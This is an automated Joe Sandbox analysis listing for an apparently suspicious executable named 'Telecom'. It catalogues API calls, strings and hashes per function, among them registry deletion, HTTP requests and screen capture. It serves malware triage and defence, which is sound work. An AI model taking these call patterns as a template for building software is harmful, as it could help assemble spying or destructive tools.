                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 004A656C
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004A6596
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                      • String ID:
                                                      • API String ID: 895679908-0
                                                      • Opcode ID: 0c220e6a13d0e10bc602ae7015bd621253696565f94e6d327addc5970b4fe8df
                                                      • Instruction ID: 0b5dce2c09ec9e5fe2faf9a55c95969bf6cdb18568adfaddc6e89cbe428e3cd4
                                                      • Opcode Fuzzy Hash: 0c220e6a13d0e10bc602ae7015bd621253696565f94e6d327addc5970b4fe8df
                                                      • Instruction Fuzzy Hash: B871B231900705EFDB20DFA8CE45AAFBBF5FF18704F15052AE586A26A0C778E940CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 004C0884
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 004C088F
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004C089A
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 004C08A5
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 004C08B0
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 004C08BB
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 004C08C6
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 004C08D1
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 004C08DC
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 004C08E7
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 004C08F2
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 004C08FD
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 004C0908
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 004C0913
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 004C091E
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004C0929
                                                      • GetCursorInfo.USER32(?), ref: 004C0939
                                                      • GetLastError.KERNEL32 ref: 004C097B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                      • String ID:
                                                      • API String ID: 3215588206-0
                                                      • Opcode ID: adebd0d3bc09dace1946d07f9e1690b6265b33fd6b6d307afc87806e95e95b17
                                                      • Instruction ID: ba5f913894f6b6f1780564c74606c06e73b6e226f2336b5c6daf88bf7dfbdd9a
                                                      • Opcode Fuzzy Hash: adebd0d3bc09dace1946d07f9e1690b6265b33fd6b6d307afc87806e95e95b17
                                                      • Instruction Fuzzy Hash: 194154B0D08319AADB509FBA8C85D5EBFE8FF04754B50452AE11CE7281DA78D801CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00460436
                                                        • Part of subcall function 0046045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0051170C,00000FA0,6162EDA1,?,?,?,?,00482733,000000FF), ref: 0046048C
                                                        • Part of subcall function 0046045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00482733,000000FF), ref: 00460497
                                                        • Part of subcall function 0046045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00482733,000000FF), ref: 004604A8
                                                        • Part of subcall function 0046045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004604BE
                                                        • Part of subcall function 0046045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004604CC
                                                        • Part of subcall function 0046045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004604DA
                                                        • Part of subcall function 0046045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00460505
                                                        • Part of subcall function 0046045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00460510
                                                      • ___scrt_fastfail.LIBCMT ref: 00460457
                                                        • Part of subcall function 00460413: __onexit.LIBCMT ref: 00460419
                                                      Strings
                                                      • InitializeConditionVariable, xrefs: 004604B8
                                                      • kernel32.dll, xrefs: 004604A3
                                                      • SleepConditionVariableCS, xrefs: 004604C4
                                                      • WakeAllConditionVariable, xrefs: 004604D2
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00460492
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 66158676-1714406822
                                                      • Opcode ID: a9015ec5249f4f67176b9c88f8f4c3208f8398764381985bfe0d659a209098f2
                                                      • Instruction ID: 88d834bd7337cf74d2d5d0264273b74fc321d50519568dabea6bd2b9b31c1e14
                                                      • Opcode Fuzzy Hash: a9015ec5249f4f67176b9c88f8f4c3208f8398764381985bfe0d659a209098f2
                                                      • Instruction Fuzzy Hash: 0421F932A417157BD7216BA5AC06BAF3794EF05B65F10016BF901963C0FFB89C418A5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CharLowerBuffW.USER32(00000000,00000000,004DDCD0), ref: 004B4F6C
                                                      • _wcslen.LIBCMT ref: 004B4F80
                                                      • _wcslen.LIBCMT ref: 004B4FDE
                                                      • _wcslen.LIBCMT ref: 004B5039
                                                      • _wcslen.LIBCMT ref: 004B5084
                                                      • _wcslen.LIBCMT ref: 004B50EC
                                                        • Part of subcall function 0045FD52: _wcslen.LIBCMT ref: 0045FD5D
                                                      • GetDriveTypeW.KERNEL32(?,00507C10,00000061), ref: 004B5188
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2055661098-1000479233
                                                      • Opcode ID: 277dcded7872984ebe18420c9fefcc1f949ce3755f2a1ae9e5d1128eb2d5a31e
                                                      • Instruction ID: 32b64ca5dadc4d66496d61987988e068a25c15dc3b7ea4cc1e6da7544dc472c9
                                                      • Opcode Fuzzy Hash: 277dcded7872984ebe18420c9fefcc1f949ce3755f2a1ae9e5d1128eb2d5a31e
                                                      • Instruction Fuzzy Hash: 94B1C331A087029FC714EF29C890BABF7E5BFA4714F50491EF49687391E738D845CAA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,004DDCD0), ref: 004C4B18
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004C4B2A
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,004DDCD0), ref: 004C4B4F
                                                      • FreeLibrary.KERNEL32(00000000,?,004DDCD0), ref: 004C4B9B
                                                      • StringFromGUID2.OLE32(?,?,00000028,?,004DDCD0), ref: 004C4C05
                                                      • SysFreeString.OLEAUT32(00000009), ref: 004C4CBF
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004C4D25
                                                      • SysFreeString.OLEAUT32(?), ref: 004C4D4F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 354098117-199464113
                                                      • Opcode ID: 6474b7bcbdca1521ac7bedd405283d48a59f1f45c79568b1a86526579f3ba0de
                                                      • Instruction ID: 4186ea7d208f03ac5e0c2871730e8e45fbbbf38b53b5d8608663ee614848f823
                                                      • Opcode Fuzzy Hash: 6474b7bcbdca1521ac7bedd405283d48a59f1f45c79568b1a86526579f3ba0de
                                                      • Instruction Fuzzy Hash: DF128975A00105AFDB54CF94C994EAABBB5FF85318F24809EF805AB261C735ED42CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00441802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00441488,?,00000000,?,?,?,?,0044145A,00000000,?), ref: 00441865
                                                      • DestroyWindow.USER32(?), ref: 00441521
                                                      • KillTimer.USER32(00000000,?,?,?,?,0044145A,00000000,?), ref: 004415BB
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 004829B4
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0044145A,00000000,?), ref: 004829E2
                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0044145A,00000000,?), ref: 004829F9
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0044145A,00000000), ref: 00482A15
                                                      • DeleteObject.GDI32(00000000), ref: 00482A27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID: <)Q
                                                      • API String ID: 641708696-2316974959
                                                      • Opcode ID: 5df1323954c53b6b998e640c6e1dce1c3077074493809c96cf54bc1dc8a95cb2
                                                      • Instruction ID: 9043bf1802b7869f9584a15e9a3c2ed27429a3f79fe7b8701e2aae6787f417dd
                                                      • Opcode Fuzzy Hash: 5df1323954c53b6b998e640c6e1dce1c3077074493809c96cf54bc1dc8a95cb2
                                                      • Instruction Fuzzy Hash: 3F616B31501711EFEB39AF18DA48B6A77B1FF90316F10852BE04296670C778ACD5DB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004BCEF5
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004BCF08
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004BCF1C
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004BCF35
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 004BCF78
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004BCF8E
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004BCF99
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004BCFC9
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004BD021
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004BD035
                                                      • InternetCloseHandle.WININET(00000000), ref: 004BD040
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                      • String ID:
                                                      • API String ID: 3800310941-3916222277
                                                      • Opcode ID: 964efd3b313902d44c9832acddb09f277929b6a74aba7441fee2b4ef5f18fb8e
                                                      • Instruction ID: d9ccf9ea4e5f3c493f87fad7b21cc8b00672ad9fbdab550bd4eac671aeacb594
                                                      • Opcode Fuzzy Hash: 964efd3b313902d44c9832acddb09f277929b6a74aba7441fee2b4ef5f18fb8e
                                                      • Instruction Fuzzy Hash: B25179B1901608BFDB219F61CC88AEB7BBCFF08748F00446BF94586250E738D945AB79
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004D66D6,?,?), ref: 004D8FEE
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D8FFE
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9009
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9016
                                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9024
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9033
                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D903C
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9043
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9054
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004E0C04,?), ref: 004D906D
                                                      • GlobalFree.KERNEL32(00000000), ref: 004D907D
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 004D909D
                                                      • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 004D90CD
                                                      • DeleteObject.GDI32(00000000), ref: 004D90F5
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004D910B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: c0967022f2c243f7dd12e5a45f11e3c4e26bedb7d3c4fa5b95a956173400c097
                                                      • Instruction ID: 7d8d2d6870eb7091aa5d4b819519358d26b57545588e57559812855d71d84de5
                                                      • Opcode Fuzzy Hash: c0967022f2c243f7dd12e5a45f11e3c4e26bedb7d3c4fa5b95a956173400c097
                                                      • Instruction Fuzzy Hash: 3D413771A01208AFDB119F65DC88EAB7BB8EF89711F10806AF906E7260D7349D41CB24
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004CC10E,?,?), ref: 004CD415
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD451
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4C8
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4FE
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CC154
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004CC1D2
                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 004CC26A
                                                      • RegCloseKey.ADVAPI32(?), ref: 004CC2DE
                                                      • RegCloseKey.ADVAPI32(?), ref: 004CC2FC
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004CC352
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004CC364
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 004CC382
                                                      • FreeLibrary.KERNEL32(00000000), ref: 004CC3E3
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004CC3F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 146587525-4033151799
                                                      • Opcode ID: 5118a8cfb1e0426995393b3976111193587d70a87071c7558ee93fde3b06c87e
                                                      • Instruction ID: 29f534a8c8430b930f729ea3d6b14e82664e815c994afdf7415572c1319a25ff
                                                      • Opcode Fuzzy Hash: 5118a8cfb1e0426995393b3976111193587d70a87071c7558ee93fde3b06c87e
                                                      • Instruction Fuzzy Hash: 95C16C34604241AFD750DF15C494F2ABBE1FF84308F58849EE85A8B3A2CB79EC46CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0
                                                      • GetSystemMetrics.USER32(0000000F), ref: 004DA990
                                                      • GetSystemMetrics.USER32(00000011), ref: 004DA9A7
                                                      • GetSystemMetrics.USER32(00000004), ref: 004DA9B3
                                                      • GetSystemMetrics.USER32(0000000F), ref: 004DA9C9
                                                      • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 004DAC15
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004DAC33
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004DAC54
                                                      • ShowWindow.USER32(00000003,00000000), ref: 004DAC73
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004DAC95
                                                      • DefDlgProcW.USER32(?,00000005,?), ref: 004DACBB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                      • String ID: @$(Q
                                                      • API String ID: 3962739598-645415278
                                                      • Opcode ID: 9a57ef51b9b4f6ae30189eecf5f696241f1036ad316ed9e7c74e1fb5c956f3f4
                                                      • Instruction ID: ab576b33566b9e2c403dff7528dc4fe88f669dd6e2fc2ba1bf1933d56d93e1ac
                                                      • Opcode Fuzzy Hash: 9a57ef51b9b4f6ae30189eecf5f696241f1036ad316ed9e7c74e1fb5c956f3f4
                                                      • Instruction Fuzzy Hash: A9B18930600219EFDF14CF68C9947AE7BB2FF44710F18806BED449A395D778A9A0CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 004C3035
                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004C3045
                                                      • CreateCompatibleDC.GDI32(?), ref: 004C3051
                                                      • SelectObject.GDI32(00000000,?), ref: 004C305E
                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 004C30CA
                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004C3109
                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004C312D
                                                      • SelectObject.GDI32(?,?), ref: 004C3135
                                                      • DeleteObject.GDI32(?), ref: 004C313E
                                                      • DeleteDC.GDI32(?), ref: 004C3145
                                                      • ReleaseDC.USER32(00000000,?), ref: 004C3150
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 33bf480f206177617a6897614c3d87f7f2336f8280c3839b456ad265b24de46d
                                                      • Instruction ID: e00dd8a31352fb71dcdc21f46d2b76f20d1d07d08283ca857fa6ce34831d9b5f
                                                      • Opcode Fuzzy Hash: 33bf480f206177617a6897614c3d87f7f2336f8280c3839b456ad265b24de46d
                                                      • Instruction Fuzzy Hash: B561F275D01219AFCB04CFA5D884EAEBBF5FF48310F20842EE555A7210D775A941CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004A52E6
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004A5328
                                                      • _wcslen.LIBCMT ref: 004A5339
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 004A5345
                                                      • _wcsstr.LIBVCRUNTIME ref: 004A537A
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 004A53B2
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 004A53EB
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 004A5445
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004A5477
                                                      • GetWindowRect.USER32(?,?), ref: 004A54EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                      • String ID: ThumbnailClass
                                                      • API String ID: 1311036022-1241985126
